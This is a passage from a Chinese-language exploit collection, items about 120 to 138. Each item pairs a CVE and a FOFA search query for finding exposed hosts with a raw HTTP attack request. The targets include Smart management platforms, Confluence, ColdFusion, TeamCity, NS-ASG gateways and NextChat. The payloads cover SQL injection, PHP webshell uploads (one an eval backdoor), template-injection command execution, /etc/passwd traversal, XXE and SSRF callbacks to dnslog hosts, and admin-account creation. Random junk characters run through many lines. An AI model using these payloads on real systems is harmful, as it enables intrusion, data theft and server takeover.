Sec-Fetch-Mode: cors
+ ]- ]6 _* P J' E' H V& g% `Sec-Fetch-Site: same-origin0 k8 L: H- l& K- q6 g+ g
X-Forwarded-For: 1.1.1.1; j% O( h: z" ^7 ~
X-Originating-Ip: 1.1.1.1- X/ f$ k3 E1 ]" E
X-Remote-Ip: 1.1.1.1. {& Z9 d8 W& X4 y0 V5 D
X-Remote-Addr: 1.1.1.19 @, x3 L. C6 H1 g: ]1 i
Te: trailers
( g1 y8 a# A# h" P! q6 {, a5 SConnection: close! \+ E* A: I) U
g+ ~0 {7 l- @+ j5 A5 G1 ?- t6 Ssrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456 X% B. Z0 D; c: m
8 Z1 ^ }. \& B% M7 h! N6 \$ i( d4 ?! i' K3 t
120. 北京百绰智能S40管理平台导入web.php任意文件上传) u8 K5 `0 e- b% g0 }
CVE-2024-1253
, D7 P; p l( ]FOFA:title="Smart管理平台"
1 ~5 S. |" J6 ]$ t% W# vPOST /useratte/web.php? HTTP/1.1/ l! G0 M; N* p3 C( ^$ B- ?
Host: ip:port! Q, F7 z* j+ g- N, b" a. r& g
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db+ y5 y# ]9 L' J# j8 r0 u
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko# k d4 m2 l) K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 n- ^& M' x1 I! j4 J5 SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 [; U6 C. O+ d0 QAccept-Encoding: gzip, deflate3 p1 P8 Q5 f: ~; ~
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
0 ~2 ?. m1 y' T H8 y/ rContent-Length: 597
" Z/ o. P) A7 i; y! @Origin: https://ip:port& ]$ R7 H/ F( W8 j
Referer: https://ip:port/sysmanage/licence.php, Y( e- }- o6 E6 [1 U8 z( u
Upgrade-Insecure-Requests: 1
% O' |. X" B7 r* ^( i% GSec-Fetch-Dest: document/ t+ n: W/ ?4 r' M
Sec-Fetch-Mode: navigate
6 A1 w2 K7 g1 l1 h# h: D, \Sec-Fetch-Site: same-origin1 F! ]: {) A0 E( [: X' A$ k$ V8 T
Sec-Fetch-User: ?14 }5 c9 M0 ]' e& s& ?
Te: trailers2 i. f5 }! A7 ?" V; f
Connection: close% K0 Y2 F: F4 C- Z
# q. o! x; o: o. g
-----------------------------42328904123665875270630079328
D8 M, o2 m& Q' W P. K! nContent-Disposition: form-data; name="file_upload"; filename="2.php"4 } l+ d3 q9 h) h
Content-Type: application/octet-stream! L7 @! Q' J$ M$ _0 n- N9 h2 v4 p' X
7 |: K: u0 a$ k1 Z<?php phpinfo()?>/ I# _; n }; b, [$ L
-----------------------------42328904123665875270630079328
1 U, D w1 F* D# O$ L ~6 ]( [6 pContent-Disposition: form-data; name="id_type"$ c3 {6 [+ V4 `7 V# ]$ l2 s
; J9 l& [% p: c. e3 o- @
1
% d4 M& k& V8 I-----------------------------42328904123665875270630079328
) F% J' Q" S: v" `& iContent-Disposition: form-data; name="1_ck"
% ]4 H$ d/ d" I p% @2 a6 S9 G' ^$ ]8 ?& m6 A, S4 r
1_radhttp7 C7 T- M# t( c1 L% {9 z
-----------------------------42328904123665875270630079328
, m% C2 N+ S& u7 N0 h% C% `Content-Disposition: form-data; name="mode"
# J5 |& F. N4 }( ^# t2 T2 ?
. b) _% {) K4 t% R2 \ z/ qimport
b4 Z& f0 t T7 P) e! f7 R-----------------------------42328904123665875270630079328
: N" H/ E1 d/ H9 ]+ {' p$ w! t5 _3 L4 t* v8 J
7 T" G0 ?1 }8 T. j文件路径/upload/2.php" ~3 I* {5 h( s. P; X7 d. q% H
0 ?" V# |% D& ~5 d0 x# t* v" X121. 北京百绰智能S42管理平台userattestation.php任意文件上传0 {& j8 ?2 Q, f2 G9 [4 Z+ h
CVE-2024-1918. Q% d' a; }/ @% F
FOFA:title="Smart管理平台"
; D# t+ O e! ~- [. N q+ f5 X8 o6 A rPOST /useratte/userattestation.php HTTP/1.1
( r7 F p1 u7 zHost: 192.168.40.130:8443
0 w) o; u( i" w R% pCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50; g0 D: Z% E7 K5 F7 o, @4 \( O$ @% o
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko1 b& ]3 k2 |5 @5 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' T' ]$ z6 R! Z; Z, U- L* I; r+ t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. U# V0 e) }* B# l& l4 i& |
Accept-Encoding: gzip, deflate
/ `9 R! K4 D N# z' tContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793287 t% A9 B" B4 a7 J8 t( m( T
Content-Length: 592
, o+ X& s0 R5 _. h' Q# pOrigin: https://192.168.40.130:8443
1 S& ?- C8 q& GUpgrade-Insecure-Requests: 1
* H9 A* k- k! `Sec-Fetch-Dest: document) u" X% ]. Y: w! ?) d( `2 u
Sec-Fetch-Mode: navigate
3 Q5 e) h2 K! Z, m" H8 A* q! r/ tSec-Fetch-Site: same-origin
( f7 q4 ~/ ?8 W+ A- PSec-Fetch-User: ?1
# s3 z' z1 r: U# t) p3 [1 GTe: trailers
$ R6 m$ O% r5 ]' }5 g$ OConnection: close
4 y- ^0 R# l. M- `5 p5 M/ X- T! g$ Y! k# c
-----------------------------42328904123665875270630079328, S, p1 g* s% \4 i9 ^, i
Content-Disposition: form-data; name="web_img"; filename="1.php"; t3 K: H7 f" K1 K
Content-Type: application/octet-stream( v# r1 w4 \9 r D# I: ~) Z
) f8 V. R4 K+ G<?php phpinfo();?>
; ^- w6 {3 f0 V# E-----------------------------42328904123665875270630079328
; ^) v0 B0 U% p0 i3 oContent-Disposition: form-data; name="id_type"
- t" Q3 \+ F7 g% |
. X" ^* Q( Q# V1
" D. x- L$ T3 f- X& y" O6 N-----------------------------42328904123665875270630079328
* C3 o3 W0 I% I' k1 `" _) Y2 [4 oContent-Disposition: form-data; name="1_ck": S3 |1 m" V" F7 x* \) @
, w0 L' _ `% E2 f, Y* ]
1_radhttp* Z/ O1 p6 F$ H8 X
-----------------------------42328904123665875270630079328* \6 Z4 K" q4 N7 }
Content-Disposition: form-data; name="hidwel"/ r Z5 q1 `0 D) g. l2 q1 ~
2 S1 m* k8 I! e
set$ I( }( @, C3 H3 _
-----------------------------42328904123665875270630079328
Y6 [* _- y8 A8 s+ x2 I. K
8 T! I. e9 X; Y5 M; E2 k$ W' G! H6 ]8 j% x! S
boot/web/upload/weblogo/1.php! _/ g. r; n# F/ C( L
" K: h; z5 h6 B122. 北京百绰智能s200管理平台/importexport.php sql注入
$ q+ \) m8 R* _- ]; I3 eCVE-2024-27718FOFA:title="Smart管理平台"; y0 T2 Q1 `- D* {3 W2 M
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
( Q7 c# d4 l, F" XGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
! C: d7 n/ b. O" C2 rHost: x.x.x.x
$ @$ b0 q+ K" ~2 HCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc03 {' {& ]# m! D- p6 ]. b% w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0$ S" J0 {( A( V) N! p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 @( j: y" ^4 |- b* R, |, d- aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: q7 I9 C, A2 n' h) r R- _6 }
Accept-Encoding: gzip, deflate, br
$ `2 K, q/ s6 D) hUpgrade-Insecure-Requests: 1
" P# A8 u: @, G. G; aSec-Fetch-Dest: document# m7 f/ |5 G4 Z- O: |
Sec-Fetch-Mode: navigate
) o( s, H' Q2 J/ ^# O4 c7 VSec-Fetch-Site: none6 x/ q! M2 t! M& t6 ~
Sec-Fetch-User: ?1
3 v4 `4 u% G6 r4 k3 TTe: trailers, B9 L ]9 n* u
Connection: close
) r e1 { ~( i# ]7 S/ F8 r/ I$ S. N6 G
7 k+ B$ e2 A4 {; r) c/ L& e
123. Atlassian Confluence 模板注入代码执行
# y# G8 f2 s* d" K; VFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"0 R% s2 |/ c$ O @0 Z; P
POST /template/aui/text-inline.vm HTTP/1.1
d0 I8 Z$ |# L. x+ r" C. M3 gHost: localhost:8090 x5 t0 M, v' A, s' D$ ?
Accept-Encoding: gzip, deflate, br
: o% C% s4 p% X' b0 D1 ^Accept: */*
/ Z7 h9 x. a+ ?Accept-Language: en-US;q=0.9,en;q=0.8& ~& L) f- H7 Q" F [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
6 A* B' x4 d( a' ` CConnection: close
( N. O: ^7 [/ D- K9 G& HContent-Type: application/x-www-form-urlencoded
0 h5 E% }6 ~% Y8 Z& ~* c- Q8 `
- c* C: ]- x4 `, Tlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))4 n/ s, k5 y% Q
1 A0 ]: G/ v w
( `- t" J' p2 O' e124. 湖南建研工程质量检测系统任意文件上传9 n, ~1 `1 c, V& b' I9 u' a% a
FOFA:body="/Content/Theme/Standard/webSite/login.css"( `1 g! @/ w" y5 Y: v) x; t# J4 N( D9 j
POST /Scripts/admintool?type=updatefile HTTP/1.1
! ^ [ i& Q$ \/ K* e6 @% F* CHost: 192.168.40.130:8282
8 Y) p) S% z0 e8 }$ c" i1 WUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36& V6 W+ \, c/ j' S+ L1 W2 H
Content-Length: 727 ?- J- X s- R& [3 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
6 E {0 J6 `8 Q9 Q" LAccept-Encoding: gzip, deflate, br: n+ D& I7 z( ?& V) O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, q& o6 J' K; \, K
Connection: close
" M5 I/ X1 e: DContent-Type: application/x-www-form-urlencoded
. p" ^0 Z% {( C
/ }* k' R0 ^& dfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
0 l6 A) I- H! B" d
" R: {; Z7 G$ f$ E0 T4 j7 q/ V0 Y0 d9 k' _7 H" U$ C7 ^
http://192.168.40.130:8282/Scripts/abcgcg.aspx& f' ]; u% H% q I! n1 H7 L
; ~; B$ Q/ i* V+ H+ l' K! a9 h" {125. ConnectWise ScreenConnect身份验证绕过5 K; n9 t* V% |# q
CVE-2024-1709
' T8 }( d e( v' VFOFA:icon_hash="-82958153"' @; X' g! k2 s0 x
https://github.com/watchtowrlabs ... bypass-add-user-poc4 F, e6 Z" A' L5 R9 Y* w$ h1 Z* v
* d1 o2 M" w+ b& f0 g& e7 F* e8 ]+ d) j! n3 s" _" i
使用方法/ H' y0 P" X1 U7 D( ^
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!. q- i) {7 s+ v7 J0 B' a/ i, m; `
' C: e$ u" o8 Y8 b, J# e3 I" O5 h
创建好用户后直接登录后台,可以执行系统命令。
! c2 v+ x( N, ?6 ]4 x$ A' s- j2 c
126. Aiohttp 路径遍历, j- I* p- r9 }$ {
FOFA:title=="ComfyUI"
) b7 D3 H6 l7 D' s# hGET /static/../../../../../etc/passwd HTTP/1.1) k9 d9 `8 C% Y! r! ^
Host: x.x.x.x2 ]2 T, G0 o( f7 d! d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
5 M' R# M, t6 l& RConnection: close! e% j% K4 C( j: d9 n9 a- p5 v3 x! L
Accept: */*3 e- G3 y5 c" Q; Y3 ^$ F6 ?
Accept-Language: en" M, O, P/ Z( U s, ^& ?4 e8 @
Accept-Encoding: gzip
( ^& o$ N! L4 k# J/ n) K( e0 v ] z5 B- q. n5 w6 Z: N( {( i/ v) y
1 r9 |: i! p r" Q( y9 T0 _- b
127. 广联达Linkworks DataExchange.ashx XXE, U! w" L/ L4 E6 _5 |
FOFA:body="Services/Identification/login.ashx"
" |) O9 _$ W9 o- X7 HPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1( u( `1 P. T8 @$ ?. ~* @( o }
Host: 192.168.40.130:8888
/ s1 |( a% r1 Y! C! r, J; a; K. _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36. b% f+ V1 Q5 H3 w: E7 y( W+ m
Content-Length: 415- M9 w: B. H2 R! D; b/ S, U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' f$ f" c9 e7 K; @/ Q5 }/ I6 IAccept-Encoding: gzip, deflate
+ A$ g( a% |2 `7 _% f$ n8 sAccept-Language: zh-CN,zh;q=0.9+ W- l( h8 G, ^2 ]% ^
Connection: close- I$ r# x8 A) K: Y8 Q
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
6 A2 t7 D2 e* C3 s) a* A" t$ aPurpose: prefetch1 c4 L9 V5 b* X; B4 T4 d
Sec-Purpose: prefetch;prerender/ N2 V" R' A7 b) K" o6 {5 B1 B
3 ], v* v m: n% U( n) Z
------WebKitFormBoundaryJGgV5l5ta05yAIe06 c0 M6 F% Y4 L
Content-Disposition: form-data;name="SystemName"
( B6 ]0 Z/ U: @) ^" [; m
8 X' x0 x7 m& v9 \/ bBIM
" C* O4 o4 J+ y$ \------WebKitFormBoundaryJGgV5l5ta05yAIe02 Y# e0 G- P$ z a8 z, d* w8 E
Content-Disposition: form-data;name="Params"
+ J5 A4 b7 y9 Y/ ^Content-Type: text/plain
4 k; Y7 g8 g" E9 ~* v6 a- t5 Z
$ |3 P \( ~; y7 C<?xml version="1.0" encoding="UTF-8"?>
7 A+ |. a' m7 w<!DOCTYPE test [$ Z# I7 Z6 s0 _& j- {- P; S$ R+ U& X
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw"> l3 w2 `# [$ a6 `/ e& Z- ?# d
]
5 m6 G9 u) j+ B' I& Y; v6 m( {, O>4 }- o# \' Z5 s" Y& Z: c
<test>&t;</test>" p V1 l4 q' F* g' g
------WebKitFormBoundaryJGgV5l5ta05yAIe0--% `' i0 e1 Y* [8 L
) d4 C0 V7 ^* |( o
4 L& Y7 r- V5 C' u& A+ ~' ~& j0 t
9 S2 W' N! B# w a8 [( d7 U128. Adobe ColdFusion 反序列化6 U. M( u9 T5 v5 I- k: F- ^
CVE-2023-38203
" m# A/ @# d5 G# N, G" E; rAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
- }4 q& G# S Z7 H- A, wFOFA:app="Adobe-ColdFusion"
7 A; ~) x1 @+ hPAYLOAD
# {# s. E! N) z+ \" @3 v
m% F, y% q7 s9 G7 s: T129. Adobe ColdFusion 任意文件读取2 v% b: f% ?: l6 R
CVE-2024-20767
, w; j6 M6 H- S- ZFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"# |- Y* r- ?3 u# K4 y' Z
第一步,获取uuid5 B9 o0 Z& C" H$ _
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
0 p) E0 D: L. D. YHost: x.x.x.x; T, }0 ^7 z) B( P( b5 `" N/ O9 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36+ o1 |4 d% y0 \. G( U9 T/ e6 M
Accept: */*: {. D9 G! a% ^% V/ U2 I9 \
Accept-Encoding: gzip, deflate4 \ x* K2 l6 m& x
Connection: close. n2 N+ k7 z) A3 `: [
5 \1 s# Z8 e+ g) k2 F
" s2 z& Y ~ }8 z+ _: w) C4 p第二步,读取/etc/passwd文件% y8 S V$ _1 z
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
* X! ?' n+ P/ n& i) P2 s9 a( M& X( QHost: x.x.x.x# g5 d* C* w2 @! H: c! [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36$ ^$ E( g$ I% G- Q+ F
Accept: */*, G; M. c' M$ @4 x6 D% n \
Accept-Encoding: gzip, deflate
V& R% d& a& p, V. pConnection: close
/ |0 s0 t6 {. k$ {# H' I# yuuid: 85f60018-a654-4410-a783-f81cbd5000b9
4 H+ h, ?% ^: H, L8 s, m. g- }& o# i7 C* f( K
* [$ ~, L) t% V+ J5 l
130. Laykefu客服系统任意文件上传3 u, P5 H* E8 p/ Q c- R9 u6 Q0 ~
FOFA:icon_hash="-334624619") r( a! }% W# ^; x) _: J$ b
POST /admin/users/upavatar.html HTTP/1.1. \ P4 i# I! a5 M* h" D) A/ o
Host: 127.0.0.1
" j2 s% ]3 P0 HAccept: application/json, text/javascript, */*; q=0.01
' f! ]5 P+ v4 H1 QX-Requested-With: XMLHttpRequest
3 Z( p6 ^0 r4 W$ I6 vUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26, l' ^; t& W% {- E8 @. ?8 [8 U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR/ T2 ]: u9 l) i3 ]7 N. h5 Q8 {
Accept-Encoding: gzip, deflate" a- F1 _" S+ s6 d v) r
Accept-Language: zh-CN,zh;q=0.9
! |% U; N! g0 P) c" }: L! ~3 f$ vCookie: user_name=1; user_id=34 H/ L: D; `/ w! {5 R; w
Connection: close; B( t9 V+ O0 s7 L
% ~( M0 c# E: b, p. ?5 N
------WebKitFormBoundary3OCVBiwBVsNuB2kR
3 g9 @' o& B |" L% zContent-Disposition: form-data; name="file"; filename="1.php"
0 I( N9 ]4 O; UContent-Type: image/png
* [0 {6 G$ x' I# |. F0 q, b 6 z4 h B# b( x, n- [' u
<?php phpinfo();@eval($_POST['sec']);?>
9 }7 z8 Z* ~# y- W# W------WebKitFormBoundary3OCVBiwBVsNuB2kR--/ q7 R1 T7 q0 V; ^7 [
5 p3 w0 D. U0 U i. q( _' q; y! E
9 R4 y. ^' k; n" D6 j
131. Mini-Tmall <=20231017 SQL注入" a' A7 n; d2 Z6 l: ^9 q W1 N% Z% p
FOFA:icon_hash="-2087517259"
$ W7 D/ ^1 B4 g5 j+ `, i8 E Q; [) K后台地址:http://localhost:8080/tmall/admin
5 a5 F" ~5 h, ]3 O8 w; dhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0) Q3 g. Y4 m1 L. T' \; y6 K, _
9 k, l; l3 |1 N) n& Q! L132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
$ C% ]: U7 B8 K1 n" L1 aCVE-2024-27198; j0 W1 B- Q- u, H! Y) A* a
FOFA:body="Log in to TeamCity"4 H( a- [ [3 C$ _1 N: i
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
: n+ @; @5 P& iHost: 192.168.40.130:8111" u! e+ ^, h/ [. ^4 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 p5 Y1 V, W4 TAccept: */*
1 _ T3 _6 [3 _' D9 Y4 J6 ~- rContent-Type: application/json
0 l, w2 s/ U9 K4 ]Accept-Encoding: gzip, deflate$ \# d8 q) N5 E! l. E
! M# n6 x0 m% M7 h. W
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}& p- m, s ]4 r* }8 o% E6 E5 g; X
6 _ {- W/ @" }
' y ?; E8 p0 ^& A$ HCVE-2024-27199
- R1 S* ~/ _% n' p1 a8 f) s/res/../admin/diagnostic.jsp$ `2 i0 c, h j5 \+ H2 L" @% {
/.well-known/acme-challenge/../../admin/diagnostic.jsp
8 h* y$ z- |" [) q z. i- r/update/../admin/diagnostic.jsp
. B* z7 h7 b% l1 ]2 {7 W
5 j4 L& `- |- E$ A; U5 J C- N
" e6 F9 @9 S* |CVE-2024-27198-RCE.py
) j1 F( B" F6 n3 `: q! a% o4 A6 i P: O9 L' h
133. H5 云商城 file.php 文件上传1 M# \" c1 i. V7 b
FOFA:body="/public/qbsp.php"
2 n V! @1 d" d) T$ T* P q! u, iPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
$ `9 Q) ^* B9 K. |Host: your-ip
% M& B N% x% S* r4 z7 ^& h9 aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
: x9 R( ]' n) d5 h' \Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx! o- u8 b7 ?8 C% k
, x0 C) h6 i) P" d7 ]3 w5 G------WebKitFormBoundaryFQqYtrIWb8iBxUCx
! B& C" i$ o! K$ M/ G; K! fContent-Disposition: form-data; name="file"; filename="rce.php"
* P; K; f% n+ t2 _Content-Type: application/octet-stream+ ?3 J! u9 T+ [+ O: k( r2 y$ `
8 i$ D1 m& J9 @7 v6 o _
<?php system("cat /etc/passwd");unlink(__FILE__);?> M- C! v. J( |8 a8 e+ s' @
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--# \' i) w7 T9 q- o2 E$ F: T
c9 E3 z; ~8 X1 R& D: O8 d' _; S/ R B& U0 l$ V/ k- V8 L
0 `( n8 k: V$ M' R* b) W# ?
134. 网康NS-ASG应用安全网关index.php sql注入
1 C6 u) B/ L) R" }- [: dCVE-2024-2330! K0 h+ u4 J3 R8 y L, O4 Y
Netentsec NS-ASG Application Security Gateway 6.3版本8 y: L! C+ A$ }0 D0 i
FOFA:app="网康科技-NS-ASG安全网关"
. g4 @' v4 N( T1 n7 @POST /protocol/index.php HTTP/1.1$ {- H4 e# s1 ^6 f- w
Host: x.x.x.x8 H( v! v, I) I) {) F" f
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de: O9 H( |: T/ ]) K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0# b) S) [5 O) Y b9 F
Accept: */** r5 D" K( h. d: V. B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( b1 Y p, X# i, C+ _
Accept-Encoding: gzip, deflate
$ a" A) g8 ?8 e7 @1 K; F# \$ q' HSec-Fetch-Dest: empty
, F" Q# H0 f8 d6 b, NSec-Fetch-Mode: cors- [" f- a: Z! Y, l4 S
Sec-Fetch-Site: same-origin
% a) R9 E" m$ J* p! LTe: trailers0 `0 p, z- c0 s# {8 W! e: p5 F
Connection: close
# h4 o( A1 }' j/ C# p7 y1 |8 b9 CContent-Type: application/x-www-form-urlencoded, G* @* d3 j1 N* L
Content-Length: 263
- m5 ]: G) V" M5 D+ b+ {& K7 Y& Q) F
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}' V; k* k; V2 U0 b p: q& X
) H& o" A" B* O, b' @0 T0 ^' d
$ D8 a5 Y' N- n
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入1 _- ]6 T+ t( ?: T4 n/ z
CVE-2024-2022. @2 a8 W/ d7 H' b+ ~& b5 }7 ]0 `
Netentsec NS-ASG Application Security Gateway 6.3版本- e( @6 Y2 h: }( d$ G
FOFA:app="网康科技-NS-ASG安全网关"
9 \$ B' A2 N. l7 n9 l& ZGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1/ U# T! }" ~: J7 W" I: m, ]# v
Host: x.x.x.x
# p. S( G8 I, a6 z3 l" n- `, {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
2 A8 ?3 [$ K |9 t) u! }4 X$ aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; f! ?+ K. F& k5 \. e6 ZAccept-Encoding: gzip, deflate
! u* U; e0 M" _' O% fAccept-Language: zh-CN,zh;q=0.93 x2 z: J5 d9 m7 P2 [
Connection: close7 P5 i2 B6 M S& ?
$ M1 X8 D1 B; X, h v2 F
- H3 t/ L, `; @, T136. NextChat cors SSRF
2 e3 c! ^$ |, `1 a. Q' U! _CVE-2023-49785
0 P0 I& H$ J/ S% XFOFA:title="NextChat"
1 ?/ ^" B y1 G2 y$ B! yGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
* C& n9 E5 M0 B7 WHost: x.x.x.x:10000 e+ C$ h) H W; |
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
1 K& V# N' u# {) RConnection: close- ^/ n" F7 I$ V$ {
Accept: */*
+ O# f0 M7 V- ~Accept-Language: en3 @, ^& u; }6 Y, D1 E
Accept-Encoding: gzip
6 t& h4 r9 p; d2 ^* [, q8 r" t6 X: H3 m8 y6 o# v e( D7 T
3 V: |1 n1 d0 V; E8 F* l3 R9 L137. 福建科立迅通信指挥调度平台down_file.php sql注入* ~$ p7 f6 V6 T9 e1 k+ d$ G
CVE-2024-2620# U: S+ H7 a$ I: x$ X* P* g
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"% g: E$ t2 E" x1 F3 T
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1+ Z+ V* y* Q+ r9 [
Host: x.x.x.x
" L5 l" J: t2 c, h9 ~& M9 M) yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: i5 K: N( p3 y& I5 y: uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 J+ |6 O$ w' m2 D) ]$ ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( _, w4 n2 s1 I. P% TAccept-Encoding: gzip, deflate, br- x8 v" p. L8 P8 O3 s
Connection: close
& a! I2 s4 m& RCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj5 M' ?# P5 m( d7 u. c0 ~
Upgrade-Insecure-Requests: 12 f: E- Q# {) u/ C
. R- Z: g1 X8 {' Q
/ B2 P$ {5 H7 T4 ^: x
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入9 I! F3 {! v/ X8 k8 I; I* E( o
CVE-2024-2621" V, X4 R3 v6 H
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
1 M5 q3 ?6 X, B6 P) n9 nGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Y2 u3 ?9 [* s# _6 _- O. @Host: x.x.x.x
2 h: ~. o* ]% f HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( B9 [; V' Y5 J. L8 T' ^8 q3 ]9 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 A4 n: \/ H: x$ [4 Z s0 Q2 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 i$ n6 Z- l( H# q( H
Accept-Encoding: gzip, deflate, br
* J. q% c ]3 V, S+ ], E' FConnection: close. m+ `( w- j! P8 j
Upgrade-Insecure-Requests: 1
